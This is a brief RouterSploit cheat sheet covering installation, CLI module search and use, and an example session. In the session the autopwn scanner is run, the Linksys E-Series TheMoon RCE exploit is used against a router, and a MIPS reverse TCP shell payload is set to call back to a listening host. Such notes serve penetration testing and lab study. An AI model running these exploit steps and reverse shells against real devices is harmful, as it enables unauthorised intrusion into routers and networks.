RouterSploit Installation
# https://github.com/threat9/routersploit

On Kali: 
apt update && apt install routersploit


On Kali and any other Linux distribution:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit   # move into routersploit directory
python3 -m pip install -r requirements.txt


To update RouterSploit run `git pull` in the RouterSploit directory.

To start RouterSploit run `python3 rsf.py` in the RouterSploit directory.


RouterSploit CLI:
# Use <tab> key multiple times for completion.

# shows all modules
rsf> show all  

# searches
rsf> search cisco
rsf> search type=exploits
rsf> search device=cameras

# selecting a module
rsf> use module_name

# displaying the options of a selected module
rsf> show options

# setting an option of a module
rsf> set option_name

# launching a module
csf> run

Example:
rsf > use scanners/autopwn
rsf (AutoPwn) > 
rsf (AutoPwn) > set target 192.168.0.1
[+] target => 192.168.0.1
rsf (AutoPwn) > show options
rsf (AutoPwn) > run

# if the target is vulnerable, execute the exploit
rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > show options
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.0.1
rsf (Linksys E-Series TheMoon RCE) > run
cmd> show payloads
cmd > set payload mipsle/reverse_tcp
cmd (MIPSLE Reverse TCP) > set lhost 192.168.0.30
lhost => 192.168.0.30
cmd (MIPSLE Reverse TCP) > run